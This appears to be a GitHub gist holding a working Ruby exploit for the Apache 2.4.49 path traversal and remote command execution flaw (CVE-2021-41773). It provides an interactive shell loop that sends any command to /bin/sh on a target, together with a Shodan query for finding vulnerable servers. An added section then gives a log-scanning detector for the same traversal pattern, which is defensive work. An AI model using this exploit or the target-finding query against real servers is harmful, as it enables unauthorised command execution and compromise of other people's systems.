@komodoooo
Last active February 20, 2023 19:26
CVE-2021-41773 exploit
require 'http'
require 'openssl'

puts """
CVE-2021-41773
Apache 2.4.49 (Unix) RCE Exploit
By komodo\n
"""

=begin
Shodan dork to search vulnerable targets:
"Apache/2.4.49 (Unix)" "HTTP/1.1 200 OK" "2d-432a5e4a73a80"
(Some of these may not be vulnerable by their configuration)
=end

def main(url, cmd)
  url.delete_suffix!("/") unless url[-1..-1] != "/"
  @ctx = OpenSSL::SSL::SSLContext.new()
  @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  path = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
  payload = "echo Content-Type: text/plain; echo; #{cmd}"
  r = HTTP.use({
    normalize_uri: { # https://github.com/httprb/http/wiki/Disabling-URI-Normalization
      normalizer: ->(uri) { HTTP::URI.parse(uri) },
    },
  }).post(url+path, :body=>payload, :ssl_context=>@ctx)
  if r.code == 200
    puts r.body
  else
    puts "Not vulnerable! (#{r.code})"
  end
end

begin
  print "Base URL: "
  baseurl = gets.chomp
  loop do
    print "$ "
    main(baseurl, gets.chomp)
  end
rescue => err
  abort(err.to_s)
end
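
On the defending side, the request built above leaves a recognisable trace in the Apache access log: dot-segments written as `%2e` that climb out of `/cgi-bin/`. The following is an added example, not part of the gist or its author's code, that scans access-log lines for that pattern and, mirroring the script's own `r.code == 200` check, separates attempts from likely successes. The log lines, addresses, function names and verdict labels are constructed for illustration.

```ruby
# Added example: flag encoded dot-segment traversal in Apache access logs (sample lines are constructed).
LOG_RE = /\A(?<host>\S+) \S+ \S+ \[[^\]]+\] "(?<method>\S+) (?<target>\S+)[^"]*" (?<status>\d{3})\b/

SAMPLE_LOG = <<~LOG.lines(chomp: true)
  192.0.2.10 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043
  198.51.100.7 - - [05/Oct/2021:10:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 45
  203.0.113.9 - - [05/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 403 199
  192.0.2.10 - - [05/Oct/2021:10:00:04 +0000] "GET /docs/v1%2e2/readme.txt HTTP/1.1" 200 512
LOG

# Percent-decode repeatedly (bounded) so nested encodings are unwrapped as well.
def deep_decode(segment, rounds = 3)
  out = segment.b
  rounds.times do
    nxt = out.gsub(/%(\h\h)/) { $1.hex.chr }
    break if nxt == out
    out = nxt
  end
  out
end

# Returns nil for a clean line, otherwise a hash describing the finding.
def classify(line)
  m = LOG_RE.match(line) or return nil
  depth = 0
  encoded = escaped = false
  m[:target].split('?', 2).first.split('/').reject(&:empty?).each do |raw|
    case deep_decode(raw)
    when '..'
      encoded ||= raw != '..'          # dot-segment was hidden behind encoding
      depth -= 1
      escaped ||= depth.negative?      # climbed above the URL root
    when '.' then encoded ||= raw != '.'
    else depth += 1
    end
  end
  return nil unless encoded
  status = m[:status].to_i
  verdict = if !escaped then :encoded_dots_only
            elsif status == 200 then :likely_success
            else :attempt
            end
  { host: m[:host], method: m[:method], status: status, verdict: verdict }
end

def scan(lines)
  lines.filter_map { |l| classify(l) }
end

scan(SAMPLE_LOG).each { |f| puts f } if $PROGRAM_NAME == __FILE__
```

A `:likely_success` finding warrants checking the host for follow-on activity, and any finding at all on a server still running 2.4.49 is a reason to upgrade it.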